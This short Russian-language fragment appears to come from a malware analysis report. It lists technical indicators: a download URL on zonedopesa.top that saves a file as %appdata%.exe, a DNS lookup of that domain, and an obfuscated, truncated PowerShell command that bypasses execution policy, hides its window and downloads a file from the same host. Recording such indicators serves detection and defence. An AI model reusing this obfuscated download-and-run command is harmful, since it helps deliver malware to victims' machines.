Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwers^He^LL.^e^x^e ^-EXe^cutIOn^poLIcy BYpAS^S^ -nOPRoFILe -^Wi^nd^ow^Sty^l^E H^IDdeN ^(NE^w-^ob^jEct^ ^s^ySTEM.^nE^t.W^eBcl^I^e^n^T).^doWN^LOA^dFiL^e^('http://www.zonedopesa...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "POwers^He^LL.^e^x^e ^-EXe^cutIOn^poLIcy BYpAS^S^ -nOPRoFILe -^Wi^nd^ow^Sty^l^E H^IDdeN ^(NE^w-^ob^jEct^ ^s^ySTEM.^nE^t.W^eBcl^I^e^n^T).^doWN^LOA^dFiL^e^('http://www.zonedopesa...' (со скрытым окном)